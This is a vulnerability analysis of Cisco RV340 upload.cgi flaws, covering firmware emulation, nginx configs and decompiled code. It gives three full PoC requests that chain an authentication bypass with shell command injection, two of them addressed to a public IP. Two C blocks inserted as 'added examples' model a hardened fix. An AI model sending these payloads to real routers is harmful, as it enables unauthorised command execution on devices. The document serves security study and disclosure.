
2022-12-20   ES  

01 Introduction

This article is mainly based on research into and analysis of the Cisco RV340 command execution vulnerability (CVE-2022-20707). Although exploiting this vulnerability requires authentication, CVE-2022-20705 can be used to bypass the existing authentication mechanism, giving unauthenticated command execution. Historically related vulnerabilities include CVE-2020-3451, CVE-2021-1473 and CVE-2021-1472; we analyze them one by one.

02 Environment Construction

2.1 Firmware download

The firmware can be downloaded from Cisco's official website:

https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.26?catid=268437899

2.2 Firmware extraction

7-Zip is recommended for extracting openwrt-comcerto2000-hgw-rootfs-ubi_nand.img from:

\RV34X-v1.0.03.22-2021-06-14-02-33-28-AM.img\RV34X-v1.0.03.22-2021-06-14-02-33-28-AM\fw.gz\fw\openwrt-comcerto2000-hgw-rootfs-ubi_nand.img

The UBI-format img is then extracted with binwalk, but there is a small pitfall here: binwalk rewrites the symbolic links to point to /dev/null.

I forcibly bypassed this logic by modifying the binwalk code:

binwalk/modules/extractor.py

2.3 QEMU system emulation

Modify the network configuration of the Ubuntu host by editing the system's network interface configuration file /etc/network/interfaces.

Edit /etc/qemu-ifup.

The specific network configuration can be found at:
https://blog.csdn.net/QQ1084283172/article/details/69378333
Restart the virtual machine. Because my Ubuntu host's network card is in NAT mode, the bridge attaches to the NAT network.

Download the corresponding Debian QEMU image:

https://people.debian.org/~aurel32/qemu/armhf/

Start the QEMU virtual machine:

    sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2 console=tty0" -net nic -net tap -nographic

Copy the extracted file system to the QEMU virtual machine:

    scp -r 1.tar root@192.168.250.173:/root/

Unpack it and chroot into the extracted root file system:

    tar zxvf 1.tar
    chmod -R 777 rootfs
    cd rootfs
    sudo mount --bind /proc proc
    sudo mount --bind /dev dev
    chroot . /bin/sh

Start the nginx service step by step:

    /etc/init.d/boot boot
    generate_default_cert
    /etc/init.d/confd start
    /etc/init.d/nginx start

Try to visit the web page:

At this point the emulation environment is complete and vulnerability testing can begin.

2.4 Debugging tips

Because the CGI is started by uwsgi as a sub-process, one process per request, attaching with gdbserver is awkward. Instead, patch the upload.cgi binary directly: overwrite the instructions at the entry of main so that they form an infinite loop:

The process then hangs there. Once gdbserver has attached, patch memory to restore the original instruction sequence:

03 CVE-2022-20705

This vulnerability is an authentication bypass caused by an improper nginx configuration. It is the precondition for using the command execution vulnerability (CVE-2022-20707).

The command execution vulnerability requires the user to reach the /upload page, which is a page that requires authentication. Checking the nginx configuration files and their include relationships, access to the /upload path is controlled by /var/nginx/conf.d/web.upload.conf:

    location /form-file-upload {
        include uwsgi_params;
        proxy_buffering off;
        uwsgi_modifier1 9;
        uwsgi_pass 127.0.0.1:9003;
        uwsgi_read_timeout 3600;
        uwsgi_send_timeout 3600;
    }
    location /upload {
        set $deny 1;
        if (-f /tmp/websession/token/$cookie_sessionid) {
            set $deny "0";
        }
        if ($deny = "1") {
            return 403;
        }
        upload_pass /form-file-upload;
        upload_store /tmp/upload;
        upload_store_access user:rw group:rw all:rw;
        upload_set_form_field $upload_field_name.name "$upload_file_name";
        upload_set_form_field $upload_field_name.content_type "$upload_content_type";
        upload_set_form_field $upload_field_name.path "$upload_tmp_path";
        upload_aggregate_form_field "$upload_field_name.md5" "$upload_file_md5";
        upload_aggregate_form_field "$upload_field_name.size" "$upload_file_size";
        upload_pass_form_field "^.*$";
        upload_cleanup 400 404 499 500-505;
        upload_resumable on;
    }

As can be seen, nginx gates access by checking whether the file /tmp/websession/token/$cookie_sessionid exists. $cookie_sessionid is controlled by the cookie we send, so we can set it to a path that is guaranteed to exist, such as ../../../../etc/passwd, and the check is bypassed.

But in addition to the nginx configuration, upload.cgi itself checks the format of the cookie that is passed in, so a value like ../../../../etc/passwd fails on the code side. The code-side verification is:

    else if ( !strcmp(v5, "/upload")
           && HTTP_COOKIE
           && strlen(HTTP_COOKIE) - 16 <= 0x40
           && !match_regex("^[A-Za-z0-9+=/]*$", HTTP_COOKIE) )
    {
        v24 = v34;
        v25 = v35;
        v26 = (int)v32;
        v27 = StrBufToStr(v41);
        sub_12684(HTTP_COOKIE, v24, v25, v26, v27, v36, v37, v38);
    }

So, is there a way to bypass nginx's authentication while also satisfying the code-side format check?

The key to the problem lies in how the back end retrieves the cookie. The code extracts the cookie value in a for loop, splitting the header on ';':

    if ( HTTP_COOKIE )
    {
        StrBufSetStr(v40, HTTP_COOKIE);
        HTTP_COOKIE = 0;
        v13 = (char *)StrBufToStr(v40);
        for ( i = strtok_r(v13, ";", &save_ptr); i; i = strtok_r(0, ";", &save_ptr) )
        {
            sessionid = strstr(i, "sessionid=");
            if ( sessionid )
                HTTP_COOKIE = sessionid + '\n';
        }
    }

In other words, we can pass two sessionid values in the cookie: the first one bypasses nginx and the second one matches upload.cgi's validation regex, because the code takes the last sessionid as the parameter value:

Cookie: sessionid=../../../etc/passwd;sessionid=Y2lzY28vMTI3LjAuMC4xLzEx;

This bypasses authentication and enters the program logic of upload.cgi.
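To make the mismatch concrete, here is an added C model of the two lookups (illustrative code written for this article, not the post's or the firmware's code): first_sessionid mimics nginx's first-match $cookie_sessionid, last_sessionid mimics the CGI's split-and-keep-last loop, and sessionid_consistent is an assumed hardening check that refuses the request unless both lookups agree on one well-formed value.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <ctype.h>
/* Added example (not the post's or the firmware's code). nginx's
 * $cookie_sessionid takes the FIRST "sessionid=" pair; upload.cgi's loop
 * keeps the LAST one (the decompiled `sessionid + '\n'` is just +10, i.e.
 * strlen("sessionid=")). The charset check mirrors ^[A-Za-z0-9+=/]*$. */
#define COOKIE_MAX 512
#define KEY "sessionid="
/* nginx-style lookup: first pair wins. Returns 1 if a value was found. */
int first_sessionid(const char *cookie, char *out, size_t n) {
    const char *p = strstr(cookie, KEY);
    if (!p) return 0;
    p += strlen(KEY);
    size_t len = strcspn(p, ";");
    if (len >= n) len = n - 1;
    memcpy(out, p, len);
    out[len] = '\0';
    return 1;
}
/* upload.cgi-style lookup: split on ';', last pair wins (strtok is used in
 * place of strtok_r here; the splitting behaviour is the same). */
int last_sessionid(const char *cookie, char *out, size_t n) {
    char buf[COOKIE_MAX], *tok, *found = NULL;
    snprintf(buf, sizeof buf, "%s", cookie);
    for (tok = strtok(buf, ";"); tok; tok = strtok(NULL, ";")) {
        char *s = strstr(tok, KEY);
        if (s) found = s + strlen(KEY);
    }
    if (!found) return 0;
    snprintf(out, n, "%s", found);
    return 1;
}
/* Charset check the CGI applies to the value it selected. */
int cgi_format_ok(const char *v) {
    for (; *v; v++)
        if (!isalnum((unsigned char)*v) && !strchr("+=/", *v)) return 0;
    return 1;
}
/* Assumed hardening (not in the firmware): accept only when both lookups
 * agree on a single well-formed value, so a second sessionid pair is rejected. */
int sessionid_consistent(const char *cookie) {
    char a[COOKIE_MAX], b[COOKIE_MAX];
    if (!first_sessionid(cookie, a, sizeof a) || !last_sessionid(cookie, b, sizeof b))
        return 0;
    return strcmp(a, b) == 0 && cgi_format_ok(a);
}
```

With the cookie from the PoC, first_sessionid yields ../../../etc/passwd (what the nginx -f test sees) while last_sessionid yields Y2lzY28vMTI3LjAuMC4xLzEx (what the CGI regex sees), which is exactly why each check passes on its own.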

04 CVE-2022-20707

After bypassing the login restriction via CVE-2022-20705, upload.cgi itself still contains a command execution vulnerability.

This is a very obvious case of command concatenation: upload.cgi processes the parameters submitted with the request into JSON and concatenates them into a command, so passing ';{cmd};' executes the command.

The parameters that upload.cgi accepts include:

    jsonutil_get_string(dword_2324C, &v31, "\"file.path\"", -1);
    jsonutil_get_string(dword_2324C, &haystack, "\"filename\"", -1);
    jsonutil_get_string(dword_2324C, &v32, "\"pathparam\"", -1);
    jsonutil_get_string(dword_2324C, &v33, "\"fileparam\"", -1);
    jsonutil_get_string(dword_2324C, &v34, "\"destination\"", -1);
    jsonutil_get_string(dword_2324C, &v35, "\"option\"", -1);
    jsonutil_get_string(dword_2324C, &v36, "\"cert_name\"", -1);
    jsonutil_get_string(dword_2324C, &v37, "\"cert_type\"", -1);
    jsonutil_get_string(dword_2324C, &v38, "\"password\"", -1);

The CGI obtains its parameters through the nginx file upload module, and some of the parameters are generated by the module itself. We choose parameters that do not affect the program's normal logic for the injection, such as destination and option.

The command string after concatenation is as follows:

You can see that the command has been executed:

Combined with the CVE-2022-20705 authentication bypass, the final PoC is:

    POST /upload HTTP/1.1
    Host: 192.168.250.173
    Content-Length: 729
    Accept: application/json, text/plain, */*
    optional-header: header-value
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryz6gIo5kcTkAlkCwX
    Origin: http://192.168.250.173
    Referer: http://192.168.250.173/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: sessionid=../../../etc/passwd;sessionid=Y2lzY28vMTI3LjAuMC4xLzEx;
    Connection: close

    ------WebKitFormBoundaryz6gIo5kcTkAlkCwX
    Content-Disposition: form-data; name="sessionid"

    EU6DJKEIWO
    ------WebKitFormBoundaryz6gIo5kcTkAlkCwX
    Content-Disposition: form-data; name="pathparam"

    Firmware
    ------WebKitFormBoundaryz6gIo5kcTkAlkCwX
    Content-Disposition: form-data; name="fileparam"

    file001
    ------WebKitFormBoundaryz6gIo5kcTkAlkCwX
    Content-Disposition: form-data; name="destination"

    x';ls>/tmp/download/1.xml;'
    ------WebKitFormBoundaryz6gIo5kcTkAlkCwX
    Content-Disposition: form-data; name="option"

    x
    ------WebKitFormBoundaryz6gIo5kcTkAlkCwX
    Content-Disposition: form-data; name="file"; filename="1.img"
    Content-Type: application/octet-stream

    1111
    ------WebKitFormBoundaryz6gIo5kcTkAlkCwX--
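As an added example (not from the post or the firmware), here is the fix a reviewer would ask for, in C: the pathparam allowlist and the file-name character check are assumptions built from the values seen in the PoCs, and copy_upload runs cp through posix_spawnp with an argv array instead of a shell string, so a destination such as x';ls>/tmp/download/1.xml;' is rejected before anything runs and could never be parsed as a command.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <spawn.h>
#include <sys/wait.h>

extern char **environ;

/* Added example, not code from the post or the firmware. It replaces the
 * pattern described above (a multipart field such as destination pasted into
 * a shell command line) with the fix a reviewer would ask for: allowlist the
 * value, then spawn the tool with an argv array so no shell ever parses it. */

/* Assumed allowlist for pathparam, built from the values seen in the PoCs. */
static const char *const PATHPARAM_ALLOWED[] = {"Firmware", "Configuration", NULL};

int pathparam_allowed(const char *v) {
    for (int i = 0; PATHPARAM_ALLOWED[i]; i++)
        if (strcmp(v, PATHPARAM_ALLOWED[i]) == 0) return 1;
    return 0;
}

/* Fields used as file names: letters, digits, '.', '_' and '-' only, no
 * leading '.', so ';', '\'', '>', '&' and '/' are all rejected. */
int filename_field_ok(const char *v) {
    if (*v == '\0' || *v == '.' || strlen(v) > 64) return 0;
    for (; *v; v++)
        if (!isalnum((unsigned char)*v) && !strchr("._-", *v)) return 0;
    return 1;
}

/* Fixed shape: validate, then exec cp directly; dest is exactly one argv entry. */
int copy_upload(const char *tmp, const char *dest) {
    char target[256];
    if (!filename_field_ok(dest)) return -1;            /* refuse before any spawn */
    snprintf(target, sizeof target, "/tmp/download/%s", dest);
    char *argv[] = {"cp", (char *)tmp, target, NULL};
    pid_t pid; int status;
    if (posix_spawnp(&pid, "cp", NULL, NULL, argv, environ) != 0) return -1;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The same two checks apply to fileparam in the CVE-2020-3451 PoC and to the sessionid in the CVE-2021-1473 PoC: values containing ';', '>' or '&' never reach a command line.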

05 CVE-2020-3451

In version 1.0.03.18 and earlier, the nginx configuration did not perform an authorization check on access. Version 1.0.00.33 is selected for analysis; in that version the CGI does not perform authorization verification on the path either.

The fileparam value is concatenated into a cp command:

When a malicious command is concatenated into the fileparam parameter, it is executed:

PoC:

    POST /upload HTTP/1.1
    Connection: close
    Accept-Encoding: gzip, deflate
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Host: 186.86.126.88:443
    Content-Type: multipart/form-data; boundary=---------------------------42194771962641085195329489787
    Content-Length: 614

    -----------------------------42194771962641085195329489787
    Content-Disposition: form-data; name="sessionid"

    FOOT
    -----------------------------42194771962641085195329489787
    Content-Disposition: form-data; name="fileparam"

    file001;ls>/www/download/3.xml;

    -----------------------------42194771962641085195329489787
    Content-Disposition: form-data; name="pathparam"

    Firmware
    -----------------------------42194771962641085195329489787
    Content-Disposition: form-data; name="file"; filename="1233.img"
    Content-Type: application/octet-stream

    111111111111111
    -----------------------------42194771962641085195329489787--

06 CVE-2021-1473 & CVE-2021-1472

In version 1.0.03.20, web.upload.conf reads:

    location /form-file-upload {
        include uwsgi_params;
        proxy_buffering off;
        uwsgi_modifier1 9;
        uwsgi_pass 127.0.0.1:9003;
        uwsgi_read_timeout 3600;
        uwsgi_send_timeout 3600;
    }

    location /upload {
        set $deny 1;

        if ($http_authorization != "") {
            set $deny "0";
        }

        if (-f /tmp/websession/token/$cookie_sessionid) {
            set $deny "0";
        }

        if ($deny = "1") {
            return 403;
        }

        upload_pass /form-file-upload;
        upload_store /tmp/upload;
        upload_store_access user:rw group:rw all:rw;
        upload_set_form_field $upload_field_name.name "$upload_file_name";
        upload_set_form_field $upload_field_name.content_type "$upload_content_type";
        upload_set_form_field $upload_field_name.path "$upload_tmp_path";
        upload_aggregate_form_field "$upload_field_name.md5" "$upload_file_md5";
        upload_aggregate_form_field "$upload_field_name.size" "$upload_file_size";
        upload_pass_form_field "^.*$";
        upload_cleanup 400 404 499 500-505;
        upload_resumable on;
    }

As long as an Authorization header is added so that $http_authorization is not empty, the authentication check is bypassed; the header value itself is never verified.

In this version of upload.cgi, the sessionid from the Cookie is passed in (as a1) when the curl command is concatenated.

The final PoC is:

    POST /upload HTTP/1.1
    Connection: close
    Accept-Encoding: gzip, deflate
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Host: 186.86.126.88:443
    Cookie: sessionid='&ls>/tmp/download/2.xml&';
    Authorization: YWRtaW46YWRtaW4=
    Content-Length: 570
    Content-Type: multipart/form-data; boundary=5097417339e2369be225700925a71758

    --5097417339e2369be225700925a71758
    Content-Disposition: form-data; name="sessionid"

    foobar
    --5097417339e2369be225700925a71758
    Content-Disposition: form-data; name="destination"

    x
    --5097417339e2369be225700925a71758
    Content-Disposition: form-data; name="fileparam"

    Configuration
    --5097417339e2369be225700925a71758
    Content-Disposition: form-data; name="pathparam"

    Configuration
    --5097417339e2369be225700925a71758
    Content-Disposition: form-data; name="file"; filename="1233.xml"
    Content-Type: text/xml

    1233333
    --5097417339e2369be225700925a71758--

07 Summary

Below is a summary of the upload.cgi series of vulnerabilities:
